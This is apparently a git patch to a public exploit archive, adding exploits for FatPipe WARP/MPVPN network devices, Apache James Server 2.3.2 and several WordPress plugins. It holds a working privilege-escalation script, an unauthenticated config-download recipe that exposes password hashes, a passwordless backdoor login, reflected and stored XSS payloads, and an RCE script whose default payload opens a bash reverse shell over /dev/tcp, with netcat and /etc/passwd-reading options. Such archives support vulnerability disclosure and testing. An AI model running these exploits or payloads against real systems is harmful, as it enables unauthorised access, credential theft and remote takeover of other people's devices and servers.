From d2b0bf596b52b207a3c48d9375e20b9b9e465556 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 29 Sep 2021 05:02:13 +0000 Subject: [PATCH] DB: 2021-09-29 10 changes to exploits/shellcodes Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) FatPipe Networks WARP 10.2.2 - Authorization Bypass FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated) WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS) WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS) WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS) --- exploits/hardware/webapps/50338.txt | 108 ++++++++++++++++ exploits/hardware/webapps/50339.txt | 81 ++++++++++++ exploits/hardware/webapps/50340.txt | 182 ++++++++++++++++++++++++++ exploits/hardware/webapps/50341.txt | 118 +++++++++++++++++ exploits/hardware/webapps/50342.py | 191 ++++++++++++++++++++++++++++ exploits/linux/remote/50347.py | 103 +++++++++++++++ exploits/php/webapps/50343.txt | 21 +++ exploits/php/webapps/50344.txt | 13 ++ exploits/php/webapps/50345.txt | 13 ++ exploits/php/webapps/50346.txt | 13 ++ files_exploits.csv | 10 ++ 11 files changed, 853 insertions(+) create mode 100644 exploits/hardware/webapps/50338.txt create mode 100644 exploits/hardware/webapps/50339.txt create mode 100644 exploits/hardware/webapps/50340.txt create mode 100644 exploits/hardware/webapps/50341.txt create mode 100755 exploits/hardware/webapps/50342.py create mode 100755 exploits/linux/remote/50347.py create mode 100644 exploits/php/webapps/50343.txt create mode 100644 exploits/php/webapps/50344.txt create mode 100644 exploits/php/webapps/50345.txt create mode 100644 exploits/php/webapps/50346.txt diff --git a/exploits/hardware/webapps/50338.txt b/exploits/hardware/webapps/50338.txt new file mode 100644 index 000000000..528d7d010 --- /dev/null +++ b/exploits/hardware/webapps/50338.txt @@ -0,0 +1,108 @@ +# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) +# Date: 25.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.fatpipeinc.com + + + + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/50339.txt b/exploits/hardware/webapps/50339.txt new file mode 100644 index 000000000..21ea88241 --- /dev/null +++ b/exploits/hardware/webapps/50339.txt @@ -0,0 +1,81 @@ +# Exploit Title: FatPipe Networks WARP 10.2.2 - Authorization Bypass +# Date: 25.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.fatpipeinc.com + +FatPipe Networks WARP 10.2.2 Authorization Bypass + + +Vendor: FatPipe Networks Inc. +Product web page: https://www.fatpipeinc.com +Affected version: WARP + 10.2.2r38 + 10.2.2r25 + 10.2.2r10 + 10.1.2r60p82 + 10.1.2r60p71 + 10.1.2r60p65 + 10.1.2r60p58s1 + 10.1.2r60p58 + 10.1.2r60p55 + 10.1.2r60p45 + 10.1.2r60p35 + 10.1.2r60p32 + 10.1.2r60p13 + 10.1.2r60p10 + 9.1.2r185 + 9.1.2r180p2 + 9.1.2r165 + 9.1.2r164p5 + 9.1.2r164p4 + 9.1.2r164 + 9.1.2r161p26 + 9.1.2r161p20 + 9.1.2r161p17 + 9.1.2r161p16 + 9.1.2r161p12 + 9.1.2r161p3 + 9.1.2r161p2 + 9.1.2r156 + 9.1.2r150 + 9.1.2r144 + 9.1.2r129 + 7.1.2r39 + 6.1.2r70p75-m + 6.1.2r70p45-m + 6.1.2r70p26 + 5.2.0r34 + +Summary: FatPipe Networks invented the concept of router-clustering, +which provides the highest level of reliability, redundancy, and speed +of Internet traffic for Business Continuity and communications. FatPipe +WARP achieves fault tolerance for companies by creating an easy method +of combining two or more Internet connections of any kind over multiple +ISPs. FatPipe utilizes all paths when the lines are up and running, +dynamically balancing traffic over the multiple lines, and intelligently +failing over inbound and outbound IP traffic when ISP services and/or +components fail. + +Desc: Improper access control occurs when the application provides direct +access to objects based on user-supplied input. As a result of this vulnerability +attackers can bypass authorization and access resources behind protected +pages. + +Tested on: Apache-Coyote/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5682 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php + + +30.05.2016 +25.07.2021 + +-- + + +$ curl -vk "https://10.0.0.9/fpui/jsp/index.jsp" \ No newline at end of file diff --git a/exploits/hardware/webapps/50340.txt b/exploits/hardware/webapps/50340.txt new file mode 100644 index 000000000..2abe48519 --- /dev/null +++ b/exploits/hardware/webapps/50340.txt @@ -0,0 +1,182 @@ +# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated) +# Date: 25.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.fatpipeinc.com + +FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Unauthenticated Config Download + + +Vendor: FatPipe Networks Inc. +Product web page: https://www.fatpipeinc.com +Affected version: WARP / IPVPN / MPVPN + 10.2.2r38 + 10.2.2r25 + 10.2.2r10 + 10.1.2r60p82 + 10.1.2r60p71 + 10.1.2r60p65 + 10.1.2r60p58s1 + 10.1.2r60p58 + 10.1.2r60p55 + 10.1.2r60p45 + 10.1.2r60p35 + 10.1.2r60p32 + 10.1.2r60p13 + 10.1.2r60p10 + 9.1.2r185 + 9.1.2r180p2 + 9.1.2r165 + 9.1.2r164p5 + 9.1.2r164p4 + 9.1.2r164 + 9.1.2r161p26 + 9.1.2r161p20 + 9.1.2r161p17 + 9.1.2r161p16 + 9.1.2r161p12 + 9.1.2r161p3 + 9.1.2r161p2 + 9.1.2r156 + 9.1.2r150 + 9.1.2r144 + 9.1.2r129 + 7.1.2r39 + 6.1.2r70p75-m + 6.1.2r70p45-m + 6.1.2r70p26 + 5.2.0r34 + +Summary: FatPipe Networks invented the concept of router-clustering, +which provides the highest level of reliability, redundancy, and speed +of Internet traffic for Business Continuity and communications. FatPipe +WARP achieves fault tolerance for companies by creating an easy method +of combining two or more Internet connections of any kind over multiple +ISPs. FatPipe utilizes all paths when the lines are up and running, +dynamically balancing traffic over the multiple lines, and intelligently +failing over inbound and outbound IP traffic when ISP services and/or +components fail. + +FatPipe IPVPN balances load and provides reliability among multiple +managed and CPE based VPNs as well as dedicated private networks. FatPipe +IPVPN can also provide you an easy low-cost migration path from private +line, Frame or Point-to-Point networks. You can aggregate multiple private, +MPLS and public networks without additional equipment at the provider's +site. + +FatPipe MPVPN, a patented router clustering device, is an essential part +of Disaster Recovery and Business Continuity Planning for Virtual Private +Network (VPN) connectivity. It makes any VPN up to 900% more secure and +300% times more reliable, redundant and faster. MPVPN can take WANs with +an uptime of 99.5% or less and make them 99.999988% or higher, providing +a virtually infallible WAN. MPVPN dynamically balances load over multiple +lines and ISPs without the need for BGP programming. MPVPN aggregates up +to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed +you need to keep your VPN up and running despite failures of service, line, +software, or hardware. + +Desc: The application is vulnerable to unauthenticated configuration disclosure +when direct object reference is made to the backup archive file using an HTTP +GET request. The only unknown part of the filename is the hostname of the system. +This will enable the attacker to disclose sensitive information and help her +in authentication bypass, privilege escalation and full system access. + +Tested on: Apache-Coyote/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5683 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5683.php + + +30.05.2016 +25.07.2021 + +-- + + +Products: +--------- +WARP / MPVPN / IPVPN + +Format: +------- +https://[TARGET]/fpui/[HostName]-config-[Product]-[Version]-mcore.tar.gz + +Examples: +--------- +curl -sk https://10.0.0.7/fpui/ZSLAB-config-WARP-9.1.2r161p19-mcore.tar.gz # For WARP +curl -sk https://10.0.0.8/fpui/testingus-config-VPN-10.2.2r38-mcore.tar.gz # For MPVPN/IPVPN + +Version: +-------- +$ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "10.2" +103:
10.2.2r38
+ +Product: +-------- +$ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "FatPipe" +15: FatPipe MPVPN | Log in + +Content: +-------- +$ tar -xf testingus-config-VPN-10.2.2r38-mcore.tar.gz +$ cd etc +$ cat Xpasswd +Administrator:26df420bcb78bb02eef532d51aea22e2:1 +fatpipe:3b5afbb47fc3067d62d73f5bb1f92b5b:1 + +$ ls +. +.. +auto_config.conf +bird.conf +bridge.conf +cm.conf +crontab +dhcpd.conf +dnssec.conf +dynamic_route.conf +fatpipe +fileserver.conf +fp_arp.conf +fp_config.dtd +fp_distributed_global_rule +fp_global_rule +fp_version +haproxy +hosts +interface_access_list.conf +ipsec.conf +ipsec.d +ipsec.secrets +ipsec_cert_secrets +ipsec_shared_secrets +ipsec_subnet.conf +ipsec_xauth.conf +ipv4_dynamic_routing.conf +logrotate.d +manifest +named.conf +network_object.conf +ntp.conf +ppp +radiusclient +resolv.conf +rsyslog.conf +site.xml +site.xml.org +snmp_config.conf +squid +sysconfig +syslog.conf +tcp-congestion-table.conf +tcp-congestion-table.conf.org +webfilter.conf +xgreet.txt +xnetmap.conf +Xpasswd +xsnmp.conf +xtreme_conf.xml \ No newline at end of file diff --git a/exploits/hardware/webapps/50341.txt b/exploits/hardware/webapps/50341.txt new file mode 100644 index 000000000..912ef064d --- /dev/null +++ b/exploits/hardware/webapps/50341.txt @@ -0,0 +1,118 @@ +# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) +# Date: 25.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.fatpipeinc.com + +FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account (Write Access) + + +Vendor: FatPipe Networks Inc. +Product web page: https://www.fatpipeinc.com +Affected version: WARP / IPVPN / MPVPN + 10.2.2r38 + 10.2.2r25 + 10.2.2r10 + 10.1.2r60p82 + 10.1.2r60p71 + 10.1.2r60p65 + 10.1.2r60p58s1 + 10.1.2r60p58 + 10.1.2r60p55 + 10.1.2r60p45 + 10.1.2r60p35 + 10.1.2r60p32 + 10.1.2r60p13 + 10.1.2r60p10 + 9.1.2r185 + 9.1.2r180p2 + 9.1.2r165 + 9.1.2r164p5 + 9.1.2r164p4 + 9.1.2r164 + 9.1.2r161p26 + 9.1.2r161p20 + 9.1.2r161p17 + 9.1.2r161p16 + 9.1.2r161p12 + 9.1.2r161p3 + 9.1.2r161p2 + 9.1.2r156 + 9.1.2r150 + 9.1.2r144 + 9.1.2r129 + 7.1.2r39 + 6.1.2r70p75-m + 6.1.2r70p45-m + 6.1.2r70p26 + 5.2.0r34 + +Summary: FatPipe Networks invented the concept of router-clustering, +which provides the highest level of reliability, redundancy, and speed +of Internet traffic for Business Continuity and communications. FatPipe +WARP achieves fault tolerance for companies by creating an easy method +of combining two or more Internet connections of any kind over multiple +ISPs. FatPipe utilizes all paths when the lines are up and running, +dynamically balancing traffic over the multiple lines, and intelligently +failing over inbound and outbound IP traffic when ISP services and/or +components fail. + +FatPipe IPVPN balances load and provides reliability among multiple +managed and CPE based VPNs as well as dedicated private networks. FatPipe +IPVPN can also provide you an easy low-cost migration path from private +line, Frame or Point-to-Point networks. You can aggregate multiple private, +MPLS and public networks without additional equipment at the provider's +site. + +FatPipe MPVPN, a patented router clustering device, is an essential part +of Disaster Recovery and Business Continuity Planning for Virtual Private +Network (VPN) connectivity. It makes any VPN up to 900% more secure and +300% times more reliable, redundant and faster. MPVPN can take WANs with +an uptime of 99.5% or less and make them 99.999988% or higher, providing +a virtually infallible WAN. MPVPN dynamically balances load over multiple +lines and ISPs without the need for BGP programming. MPVPN aggregates up +to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed +you need to keep your VPN up and running despite failures of service, line, +software, or hardware. + +Desc: The application has a hidden administrative account 'cmuser' that has +no password and has write access permissions to the device. The user cmuser +is not visible in Users menu list of the application. + +Tested on: Apache-Coyote/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5684 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php + + +30.05.2016 +25.07.2021 + +-- + + +Overview: +FatPipe Central Manager is a secure web based solution providing a centralized solution +to manage FatPipe's suite of WAN reliability and optimization products. Central Manager +allows you to configure, manage and monitor FatPipe's patented MPSec technology at the +click of a button. + +Central Manager = cmuser. +Once authenticated, you get admin rights. + +HTTP/1.1 200 OK +Server: Apache-Coyote/1.1 +Strict-Transport-Security: max-age=31536000 +X-Frame-Options: DENY +X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +Content-Type: application/json;charset=ISO-8859-1 +Content-Length: 118 +Date: Fri, 06 Aug 2017 16:37:07 GMT +Connection: close + +{"loginRes":"success","userName":"userName","userAccess":"writeAccess","activeUserName":"cmuser","message":"noError"} \ No newline at end of file diff --git a/exploits/hardware/webapps/50342.py b/exploits/hardware/webapps/50342.py new file mode 100755 index 000000000..0e82e9247 --- /dev/null +++ b/exploits/hardware/webapps/50342.py @@ -0,0 +1,191 @@ +# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation +# Date: 25.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.fatpipeinc.com + +#!/usr/bin/env python3 +# +# +# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation +# +# +# Vendor: FatPipe Networks Inc. +# Product web page: https://www.fatpipeinc.com +# Affected version: WARP / IPVPN / MPVPN +# 10.2.2r38 +# 10.2.2r25 +# 10.2.2r10 +# 10.1.2r60p82 +# 10.1.2r60p71 +# 10.1.2r60p65 +# 10.1.2r60p58s1 +# 10.1.2r60p58 +# 10.1.2r60p55 +# 10.1.2r60p45 +# 10.1.2r60p35 +# 10.1.2r60p32 +# 10.1.2r60p13 +# 10.1.2r60p10 +# 9.1.2r185 +# 9.1.2r180p2 +# 9.1.2r165 +# 9.1.2r164p5 +# 9.1.2r164p4 +# 9.1.2r164 +# 9.1.2r161p26 +# 9.1.2r161p20 +# 9.1.2r161p17 +# 9.1.2r161p16 +# 9.1.2r161p12 +# 9.1.2r161p3 +# 9.1.2r161p2 +# 9.1.2r156 +# 9.1.2r150 +# 9.1.2r144 +# 9.1.2r129 +# 7.1.2r39 +# 6.1.2r70p75-m +# 6.1.2r70p45-m +# 6.1.2r70p26 +# 5.2.0r34 +# +# Summary: FatPipe Networks invented the concept of router-clustering, +# which provides the highest level of reliability, redundancy, and speed +# of Internet traffic for Business Continuity and communications. FatPipe +# WARP achieves fault tolerance for companies by creating an easy method +# of combining two or more Internet connections of any kind over multiple +# ISPs. FatPipe utilizes all paths when the lines are up and running, +# dynamically balancing traffic over the multiple lines, and intelligently +# failing over inbound and outbound IP traffic when ISP services and/or +# components fail. +# +# FatPipe IPVPN balances load and provides reliability among multiple +# managed and CPE based VPNs as well as dedicated private networks. FatPipe +# IPVPN can also provide you an easy low-cost migration path from private +# line, Frame or Point-to-Point networks. You can aggregate multiple private, +# MPLS and public networks without additional equipment at the provider's +# site. +# +# FatPipe MPVPN, a patented router clustering device, is an essential part +# of Disaster Recovery and Business Continuity Planning for Virtual Private +# Network (VPN) connectivity. It makes any VPN up to 900% more secure and +# 300% times more reliable, redundant and faster. MPVPN can take WANs with +# an uptime of 99.5% or less and make them 99.999988% or higher, providing +# a virtually infallible WAN. MPVPN dynamically balances load over multiple +# lines and ISPs without the need for BGP programming. MPVPN aggregates up +# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed +# you need to keep your VPN up and running despite failures of service, line, +# software, or hardware. +# +# Desc: The application suffers from a privilege escalation vulnerability. +# A normal user (group USER, 0) can elevate her privileges by sending a HTTP +# POST request and setting the JSON parameter 'privilege' to integer value +# '1' gaining administrative rights (group ADMINISTRATOR, 1). +# +# Tested on: Apache-Coyote/1.1 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2021-5685 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php +# +# +# 30.05.2016 +# 25.07.2021 +# +# + +import sys +import time####### +import requests################ +requests.packages.urllib3.disable_warnings() + +if len(sys.argv) !=2: + print + print("********************************************************") + print("* *") + print("* Privilege escalation from USER to ADMINISTRATOR role *") + print("* in *") + print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *") + print("* *") + print("* ZSL-2021-5685 *") + print("* *") + print("********************************************************") + print("\n[POR] Usage: ./escalator.py [IP]") + sys.exit() + +ajpi=sys.argv[1] +print +juzer=raw_input("[UNE] Username: ") +pasvord=raw_input("[UNE] Password: ") + +sesija=requests.session() +logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'} + +hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"', + 'Accept' :'application/json, text/javascript, */*; q=0.01', + 'X-Requested-With':'XMLHttpRequest', + 'Sec-Ch-Ua-Mobile':'?0', + 'User-Agent' :'Fatnet/1.b', + 'Content-Type' :'application/x-www-form-urlencoded; charset=UTF-8', + 'Origin' :'https://'+ajpi, + 'Sec-Fetch-Site' :'same-origin', + 'Sec-Fetch-Mode' :'cors', + 'Sec-Fetch-Dest' :'empty', + 'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet', + 'Accept-Encoding' :'gzip, deflate', + 'Accept-Language' :'en-US,en;q=0.9', + 'Connection' :'close'} + +juarel1='https://'+ajpi+'/fpui/loginServlet' +alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False) + +if not 'success' in alo.text: + print('[GRE] Login error.') + sys.exit() +else: + print('[POR] Authentication successful.') + +print('[POR] Climbing the ladder...') + +sluba=''' +|| || .--._ +||====|| __ '---._) +|| ||"")\ Q Q ) +||====|| =_/ o / +|| || | \_.-;-'-,._ +||====|| | ' o---o ) +|| || \ /H __H\ / +||====|| '-' \"")\/ | +|| || _ |_='-)_/ +||====|| / '. ) +|| || / / +||====|| |___/\| / +|| || |_| | | +||====|| / ) \\ \\ +|| || (__/ \___\\ +||====|| \_\\ +|| || / ) +||====|| (__/ +''' + +for k in sluba: + sys.stdout.write(k) + sys.stdout.flush() + time.sleep(0.01) + +juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest' +posta={ +'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]' +} +stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False) + +if not 'true' in stanje.text: + print('\n[GRE] Something\'s fishy!') + sys.exit() +else: + print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.') + sys.exit() \ No newline at end of file diff --git a/exploits/linux/remote/50347.py b/exploits/linux/remote/50347.py new file mode 100755 index 000000000..ebaae986d --- /dev/null +++ b/exploits/linux/remote/50347.py @@ -0,0 +1,103 @@ +# Exploit Title: Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2) +# Date: 27/09/2021 +# Exploit Author: shinris3n +# Vendor Homepage: http://james.apache.org/server/ +# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip +# Version: Apache James Server 2.3.2 +# Tested on: Ubuntu +# Info: This exploit works on default installation of Apache James Server 2.3.2 +# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d + +''' +This Python 3 implementation is based on the original (Python 2) exploit code developed by +Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec. The following modifications were made: + +1 - Made required changes to print and socket commands for Python 3 compatibility. +1 - Changed the default payload to a basic bash reverse shell script and added a netcat option. +2 - Changed the command line syntax to allow user input of remote ip, local ip and listener port to correspond with #2. +3 - Added a payload that can be used for testing remote command execution and connectivity. +4 - Added payload and listener information output based on payload selection and user input. +5 - Added execution output clarifications and additional informational comments throughout the code. + +@shinris3n +https://twitter.com/shinris3n +https://shinris3n.github.io/ +''' + +#!/usr/bin/python3 + +import socket +import sys +import time + +# credentials to James Remote Administration Tool (Default - root/root) +user = 'root' +pwd = 'root' + +if len(sys.argv) != 4: + sys.stderr.write("[-]Usage: python3 %s \n" % sys.argv[0]) + sys.stderr.write("[-]Example: python3 %s 172.16.1.66 172.16.1.139 443\n" % sys.argv[0]) + sys.stderr.write("[-]Note: The default payload is a basic bash reverse shell - check script for details and other options.\n") + sys.exit(1) + +remote_ip = sys.argv[1] +local_ip = sys.argv[2] +port = sys.argv[3] + +# Select payload prior to running script - default is a reverse shell executed upon any user logging in (i.e. via SSH) +payload = '/bin/bash -i >& /dev/tcp/' + local_ip + '/' + port + ' 0>&1' # basic bash reverse shell exploit executes after user login +#payload = 'nc -e /bin/sh ' + local_ip + ' ' + port # basic netcat reverse shell +#payload = 'echo $USER && cat /etc/passwd && ping -c 4 ' + local_ip # test remote command execution capabilities and connectivity +#payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # proof of concept exploit on root user login only + +print ("[+]Payload Selected (see script for more options): ", payload) +if '/bin/bash' in payload: + print ("[+]Example netcat listener syntax to use after successful execution: nc -lvnp", port) + + +def recv(s): + s.recv(1024) + time.sleep(0.2) + +try: + print ("[+]Connecting to James Remote Administration Tool...") + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.connect((remote_ip,4555)) # Assumes James Remote Administration Tool is running on Port 4555, change if necessary. + s.recv(1024) + s.send((user + "\n").encode('utf-8')) + s.recv(1024) + s.send((pwd + "\n").encode('utf-8')) + s.recv(1024) + print ("[+]Creating user...") + s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n".encode('utf-8')) + s.recv(1024) + s.send("quit\n".encode('utf-8')) + s.close() + + print ("[+]Connecting to James SMTP server...") + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.connect((remote_ip,25)) # Assumes default SMTP port, change if necessary. + s.send("ehlo team@team.pl\r\n".encode('utf-8')) + recv(s) + print ("[+]Sending payload...") + s.send("mail from: <'@team.pl>\r\n".encode('utf-8')) + recv(s) + # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n".encode('utf-8')) if the recipient cannot be found + s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n".encode('utf-8')) + recv(s) + s.send("data\r\n".encode('utf-8')) + recv(s) + s.send("From: team@team.pl\r\n".encode('utf-8')) + s.send("\r\n".encode('utf-8')) + s.send("'\n".encode('utf-8')) + s.send((payload + "\n").encode('utf-8')) + s.send("\r\n.\r\n".encode('utf-8')) + recv(s) + s.send("quit\r\n".encode('utf-8')) + recv(s) + s.close() + print ("[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).") + if '/bin/bash' in payload: + print ("[+]Don't forget to start a listener on port", port, "before logging in!") +except: + print ("Connection failed.") \ No newline at end of file diff --git a/exploits/php/webapps/50343.txt b/exploits/php/webapps/50343.txt new file mode 100644 index 000000000..e0d5522bc --- /dev/null +++ b/exploits/php/webapps/50343.txt @@ -0,0 +1,21 @@ +# Exploit Title: WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated) +# Date: 06-08-2021 +# Exploit Author: Nosa Shandy (Apapedulimu) +# Vendor Homepage: https://translatepress.com/ +# Software Link: https://wordpress.org/plugins/translatepress-multilingual/ +# Reference: https://wpscan.com/vulnerability/b87fcc2f-c2eb-4e23-9757-d1c590f26d3f +# Version: 2.0.6 +# Tested on: macOS 11.4 +# CVE : CVE-2021-24610 + +Description: +The plugin does not implement a proper filter on the 'translated' parameter when input to the database. The 'trp_sanitize_string' function only check the "" with the preg_replace, the attacker can use the HTML Tag to execute javascript. + +Step To Reproduce: +1. Go to http://localhost:8888/wordpress/?trp-edit-translation=true +2. Input Gettext String +3. Input the payload such as +4. Save, The payload will be executed. +5. Look on the homepage will be affected. + +Video : https://drive.google.com/file/d/1PnvjHuKCvjmom6xz_sxNLBu3jixCiHy_/view?usp=sharing \ No newline at end of file diff --git a/exploits/php/webapps/50344.txt b/exploits/php/webapps/50344.txt new file mode 100644 index 000000000..491c6280d --- /dev/null +++ b/exploits/php/webapps/50344.txt @@ -0,0 +1,13 @@ +# Exploit Title: WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS) +# Date: 3/28/2021 +# Author: 0xB9 +# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/ +# Version: 1.7.14 +# Tested on: Windows 10 +# CVE: CVE-2021-24276 + +1. Description: +The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue + +2. Proof of Concept: +/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)// \ No newline at end of file diff --git a/exploits/php/webapps/50345.txt b/exploits/php/webapps/50345.txt new file mode 100644 index 000000000..3fb42cad2 --- /dev/null +++ b/exploits/php/webapps/50345.txt @@ -0,0 +1,13 @@ +# Exploit Title: WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS) +# Date: 3/28/2021 +# Author: 0xB9 +# Software Link: https://wordpress.org/plugins/ultimate-maps-by-supsystic/ +# Version: 1.2.4 +# Tested on: Windows 10 +# CVE: CVE-2021-24274 + +1. Description: +The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue + +2. Proof of Concept: +/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)// \ No newline at end of file diff --git a/exploits/php/webapps/50346.txt b/exploits/php/webapps/50346.txt new file mode 100644 index 000000000..9aa1ba1e2 --- /dev/null +++ b/exploits/php/webapps/50346.txt @@ -0,0 +1,13 @@ +# Exploit Title: WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS) +# Date: 3/28/2021 +# Author: 0xB9 +# Software Link: https://wordpress.org/plugins/popup-by-supsystic/ +# Version: 1.10.4 +# Tested on: Windows 10 +# CVE: CVE-2021-24275 + +1. Description: +The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue + +2. Proof of Concept: +/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)// \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ad8c32547..1495e51f5 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18539,6 +18539,7 @@ id,file,description,date,author,type,platform,port 50216,exploits/linux/remote/50216.py,"crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow",1970-01-01,"Khaled Salem",remote,linux, 50282,exploits/hardware/remote/50282.txt,"ECOA Building Automation System - Hard-coded Credentials SSH Access",1970-01-01,Neurogenesia,remote,hardware, 50335,exploits/hardware/remote/50335.py,"Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers",1970-01-01,"Michael Alamoot",remote,hardware, +50347,exploits/linux/remote/50347.py,"Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)",1970-01-01,shinris3n,remote,linux, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, @@ -44453,3 +44454,12 @@ id,file,description,date,author,type,platform,port 50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php, 50333,exploits/php/webapps/50333.txt,"WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Renos Nikolaou",webapps,php, 50334,exploits/php/webapps/50334.txt,"Library System 1.0 - 'student_id' SQL injection (Authenticated)",1970-01-01,"Vinay Bhuria",webapps,php, +50338,exploits/hardware/webapps/50338.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware, +50339,exploits/hardware/webapps/50339.txt,"FatPipe Networks WARP 10.2.2 - Authorization Bypass",1970-01-01,LiquidWorm,webapps,hardware, +50340,exploits/hardware/webapps/50340.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, +50341,exploits/hardware/webapps/50341.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)",1970-01-01,LiquidWorm,webapps,hardware, +50342,exploits/hardware/webapps/50342.py,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation",1970-01-01,LiquidWorm,webapps,hardware, +50343,exploits/php/webapps/50343.txt,"WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site 